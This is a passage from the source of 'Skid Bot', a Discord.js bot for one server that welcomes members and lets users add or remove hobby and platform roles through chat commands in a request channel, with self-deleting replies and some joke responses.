"license_type": "permissive",
"max_line_length": 261,
"num_lines": 696,
"path": "/JavaScript/DiscordBots/skid-bot/index.js",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Skid Bot created by ZenIsBestWolf#0446.\n// This is intended for one server only. Things may break if used in multiple servers.\n// This also wasn't designed to be forked. Forking this and trying to use this in your server will cause issues!\nconst Discord = require('discord.js');\nconst client = new Discord.Client();\nvar token = process.env.TOKEN;\nvar prefix = \".\"\nvar zen = \"183672121522782208\"\nvar requestChannelID = \"376485787245608970\"\nclient.on('ready', () => {\n\tconsole.log('Skid Bot is online. Prefix is ' + prefix)\n\tclient.user.setGame('being a skid.')\n});\nvar memberTrackingChannelID = \"376484628762198027\"\nclient.on('guildMemberAdd', member => {\n\tlet guild = member.guild;\n\tguild.channels.get(memberTrackingChannelID).send(member + \" has joined the server! Welcome!\");\n});\nclient.on('guildMemberRemove', member => {\n\tlet guild = member.guild;\n\tguild.channels.get(memberTrackingChannelID).send(member + \" has left. RIP!\");\n});\nclient.on('message', message => {\n\tif (!message.content.startsWith(prefix)) return;\n\tif (message.author.bot) return;\n\tvar args = message.content.substring(prefix.length).split(\" \");\n\tif (message.channel.id === requestChannelID) {\n\t\tvar role = args.join(' ').slice(args[0].length).trim().toLowerCase()\n\t\tswitch (args[0].toLowerCase()) {\n\t\t\tcase \"addrole\":\n\t\t\t\tswitch (role) {\n\t\t\t\t\tcase \"android\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Android\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Android\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"bacon\":\n\t\t\t\t\t\tmessage.reply(\":smirk: Either you looked at the source code or you really wanted to know if there was a bacon role. 
God dammit.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"bot\":\n\t\t\t\t\t\tmessage.reply(\":x: You aren't a bot silly!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"furry\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Furry\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Furry\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"gamer\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Gamer\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Gamer\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"ios\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"iOS\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"iOS\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"little boys\":\n\t\t\t\t\t\tmessage.reply(\":x: No one is eligible for this role.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"lol\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"LoL\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"LoL\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"league of legends\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"LoL\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"LoL\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e 
=> setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"meme lord\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Meme Lord\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Meme Lord\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"muted\":\n\t\t\t\t\t\tmessage.reply(\":x: Trust me, you don\\'t want that role.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"nintendo switch\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Nintendo Switch\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Nintendo Switch\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"overwatch\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Overwatch\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Overwatch\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"pc\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"PC Master Race\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"PC Master Race\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"pc master race\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"PC Master Race\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"PC Master Race\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 
\"playstation\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"PlayStation\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"PlayStation\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"roblox\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"ROBLOX\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"ROBLOX\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"skid\":\n\t\t\t\t\t\tmessage.reply(\":x: Use ``.finish`` to add that role. :exclamation: **This will remove you from this channel and send you to the main chat.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"staff\":\n\t\t\t\t\t\tmessage.reply(\":x: We can\\'t just give you the staff role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"super skid\":\n\t\t\t\t\t\tmessage.reply(\":x: Only I can have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"techie\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Techie\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Techie\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"weeb\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Weeb\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Weeb\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"weeaboo\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Weeb\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 
10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Weeb\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"wow\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"WoW\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"WoW\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"world of warcraft\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"WoW\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"WoW\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"xbox\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Xbox\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Xbox\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tdefault:\n\t\t\t\t\t\tmessage.reply(\":question: I can't find that role. Did you spell it right?\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t};\n\t\t\t\tbreak;\n\t\t\tcase \"removerole\":\n\t\t\t\tswitch (role) {\n\t\t\t\t\tcase \"android\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"Android\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Android\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"bacon\":\n\t\t\t\t\t\tmessage.reply(\":smirk: Either you looked at the source code or you really wanted to know if there was a bacon role. God dammit.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"bot\":\n\t\t\t\t\t\tmessage.reply(\":x: You aren't a bot silly!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"furry\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"Furry\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Furry\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"gamer\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"Gamer\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Gamer\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"ios\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"iOS\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"iOS\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"little boys\":\n\t\t\t\t\t\tmessage.reply(\":x: No one is eligible for this role.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"lol\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"LoL\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"LoL\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"league of legends\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"LoL\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"LoL\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"meme lord\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"Meme Lord\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Meme Lord\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"muted\":\n\t\t\t\t\t\tmessage.reply(\":x: You don't have that role, nor do you want it.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"nintendo switch\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"Nintendo Switch\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Nintendo Switch\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"overwatch\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"Overwatch\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Overwatch\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"pc\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"PC Master Race\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"PC Master Race\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"pc master race\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"PC Master Race\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"PC Master Race\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"playstation\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"PlayStation\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"PlayStation\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"roblox\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"ROBLOX\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 